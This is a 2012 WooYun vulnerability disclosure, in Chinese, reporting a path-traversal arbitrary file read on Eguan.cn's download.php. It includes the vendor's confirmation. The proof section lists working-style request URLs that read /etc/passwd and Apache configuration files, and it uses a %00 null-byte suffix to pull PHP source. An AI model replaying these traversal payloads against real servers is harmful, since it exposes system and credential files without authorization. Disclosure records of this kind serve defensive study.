漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-016718
漏洞标题:易观网主站任意文件读取,导致大量敏感信息泄露
相关厂商:易观网
漏洞作者: txcbg
提交时间:2012-12-31 09:36
修复时间:2013-02-14 09:36
公开时间:2013-02-14 09:36
漏洞类型:敏感信息泄露
危害等级:高
自评Rank:12
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-12-31: 细节已通知厂商并且等待厂商处理中
2013-01-04: 厂商已经确认,细节仅向厂商公开
2013-01-14: 细节向核心白帽子及相关领域专家公开
2013-01-24: 细节向普通白帽子公开
2013-02-03: 细节向实习白帽子公开
2013-02-14: 细节向公众公开
简要描述:
易观网主站任意文件读取,导致大量敏感信息泄露。
详细说明:
易观网主站存在任意文件下载漏洞,从而可以读取服务器上的任意文件(权限允许的情况下),然后服务器上的用户信息、Apache配置文件、虚拟主机配置文件、MySQL配置文件等
等大量敏感信息都可以读取了。还可以读取网站目录下的任意文件。幸亏你们的数据库连接配置文件config.inc.php藏得深,一时没找到,不然也可以读取。一旦读取到,服务器上的所有数据库面临泄露的风险。
漏洞证明:
访问http://www.eguan.cn/download/download.php?aid=151208&path=/../../../../../etc/passwd,就可以下载passwd文件了,如图1,然后看到了服务器上的所有用户信息,如
图2。
http://www.eguan.cn/download/download.php?aid=151208&path=/../../../../../etc/httpd/conf/httpd.conf,下载了Apache的配置文件httpd.conf。
http://www.eguan.cn/download/download.php?aid=151208&path=/../../../../../etc/httpd/conf/virtualhost,下载了Apache的虚拟主机配置文件virtualhost,可以读取所有易观网的网
站的物理路径,如图3。
另外还可以读取的敏感文件有my.cnf等。
直接构造http://www.eguan.cn/download/download.php?aid=151208&path=/../../../../../var/www/html/wwwroot/i/login.php会提示不让下载,但发现地址最后加上%00就可以下载到
php文件了,访问http://www.eguan.cn/download/download.php?aid=151208&path=/../../../../../var/www/html/wwwroot/i/login.php%00,成功下载到了易观网用户登录的文件,并看到
了文件的源代码,如图4,5。
修复方案:
管理员懂的。
版权声明:转载请注明来源 txcbg@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-01-04 09:51
厂商回复:
这个问题很严重 感谢 txcbg 对易观网的关注 我们正在修复这个问题 再次万分感谢
最新状态:
暂无